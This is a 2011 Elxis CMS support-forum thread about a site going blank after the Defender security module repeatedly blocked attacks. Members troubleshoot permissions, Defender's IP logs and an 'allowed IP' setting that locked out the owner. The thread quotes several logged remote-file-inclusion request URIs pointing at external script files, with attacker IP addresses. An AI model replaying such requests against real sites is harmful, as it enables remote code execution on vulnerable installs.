Elxis CMS Forum
Support => Technical support => Topic started by: wbread on January 10, 2011, 13:03:05
-
Yesterday my site was working and today I saw - nothing white sheet.
code pages only <div class="blogleading">
and the mail came a letter
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 211.202.1.236 (blocked)
Requested URI: /index.php?option=com_gcalendar&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt??
DATE: 10-01-2011 09:31:57
Attack was logged
Site turned offline for 20 seconds
Similar attacks are often not particularly worried, but right now am beginning to worry
observe safety
What could happen? :'(
http://furmanoff.net/
-
Ftp access ? What you see ?
-
Check your log & Error logs
Defender say's that he has block the attack.
-
All files in place (such as)
Admin work, even visitors can see
tried to reinstall but still the same
-
Check your log & Error logs
Defender say's that he has block the attack.
-
that was after, site no longer worked
-
Check that folder permisions
-
everything as it was
-
Tell us the permission of folder: public_html!
-
751
-
do it 755
-
set 755
;D may be in a permanent site is disabled due to attacks
whom we can see, I arrived at the patient corn
ATTACKER IP ADDRESS: 212.35.204.148 (blocked)
— Скрыть цитируемый текст —
Requested URI: //index.php?option=com_rss&mosConfig.absolute.path=http://cabinet-sl.com/xmlrpc/pandegaid.txt?
DATE: 10-01-2011 16:13:07
ATTACKER IP ADDRESS: 217.148.91.44 (blocked)
Requested URI: //index.php?option=com_rss&mosConfig.absolute.path=http://cabinet-sl.com/xmlrpc/pandegaid.txt?
DATE: 10-01-2011 16:13:07
Attack was logged
Site turned offline for 20 seconds
-
These attacks log are silly.
Elxis is not Joomla.
-
i know ;D
hard reinstall? ??? upload all new.
-
check the site today - running through the 2 minutes receive a letter about the attack and the site is shut off again for a long time.
can change the time block the site, with attacks, so affected?
I changed the time from 10 to 20 seconds, and it was then that we can say it all started, now I'm back 10 seconds back and see what happens.
-
Now i see, the login page.
The emails from Defender, aren't warnings of an upcoming attack. But successfully repelled attacks. Defender is not the problem.
-
I changed the time from 10 to 20 seconds, and it was then that we can say it all started, now I'm back 10 seconds back and see what happens.
If you have enable the option to block the IP, you can set the time also to 0, because any attack from the blocked IPs will be denied automatically.
Setting the time to 20 second, the risk is the visitors come after an attack will not able to see your site.
-
Now i see, the login page.
The emails from Defender, aren't warnings of an upcoming attack. But successfully repelled attacks. Defender is not the problem.
Now it's not available again :(
-
What do you mean, it's not available? White page again>?
-
yes :(
-
I think you are self-blocked. From Defender or from the server (firewall). I see your site locked, but not the blank page.
- If blocked from Defender: Go to /administrator/tools/defender/logs and make sure the file ip.txt is clear and has no data.
- If blocked from server, contact your provider.
-
If blocked from server, or If blocked from Defender - how can I get into the admin panel :-\
my IP is not loged, My IP in White List
Firewall - checked
-
Access /administrator/tools/defender/logs with FTP
-
777
or I did not understand you ???
-
No no no. Please read what i wrote. Access your hosting account, with FTP. and do what i wrote above.
-
im in /administrator/tools/defender/logs
allowed.txt
ip.txt
lastmail.txt
log.txt
offline.txt
range.txt
-
download ip.txt
check if it has any data.
if tis does, delete it
save the file
upload it, back again
and check if you see you site
-
no ;D
-
Can't think anything else right now. But for sure, the problem is from your side. I see the site up (locked).
-
i deleted all cooki the domain- everything works :D thanks for the help
how I could get under the action Defender?
-
how I could get under the action Defender?
http://wiki.elxis.org/wiki/Elxis_Defender
-
After login, he kicked me again
i again deleted all cooki, clear ip.txt
and now he will not let me even in the admin panel
i will kill him ;D
http://wiki.elxis.org/wiki/Elxis_Defender
i read his, there is no answer to my question=)
It would be useful to give an example of the minimum useful configuration and explanation of some aspects except filters, for example Protected variables
-
Take a look on that article about PHP Settings : http://wiki.elxis.org/wiki/PHP_settings
I think that goes wrong here.
-
I think that goes wrong here.
Stavro, and why do i see the site working, when wbread doesn't?
-
Take a look on that article about PHP Settings : http://wiki.elxis.org/wiki/PHP_settings
I think that goes wrong here.
He's right, the settings are all done correctly, after i reinstall my site worked.
After attempts to recover files of modules and components back from the backup, again - all is not working.
defender - new all files :-\
-
Sorry Supernet i see a white page on : http://furmanoff.net/ which means the main folder permission must be changed or the server has blocked my ip.
Check the folder permission and communicate with your host provider ,wbread.
I can't understand your move to recover files.
-
Confirmed. Right now, i see blank page, also!
-
I want to recover because the modules in the database already exists, as the information in them, as much has already been translated and customized to the site, do a sample of this volume is difficult.
Re-installed the required components for one.
Server of our company so that everything is under control with that party.
after reinstalling, I will write what happened.
-
It seems that you block your self.
If you have static ip add it in the defender so you can do anything on your website, otherwise turn off the option to block the ip of the attacker.
-
Now i can see the website.!
-
It seems that you block your self.
If you have static ip add it in the defender so you can do anything on your website, otherwise turn off the option to block the ip of the attacker.
but in list of blocked my ip was not, even so I cleaned the log and added to the allowed ip.
Yes my site is working, I reinstalled it on the new and is being rebuilt modules
-
I propose you to select to block the attacker's IP address instead of turning your site offline.
Might someone continuously scanning your site...
If you enable the allowed ip option then only that IP is allowed to access the site! That's why you blocked your self out without being in the ban list. Use that option only if you have an internet connection with a static IP! If you have a dynamic IP (most probably) then each time you connect to the internet you get a new one.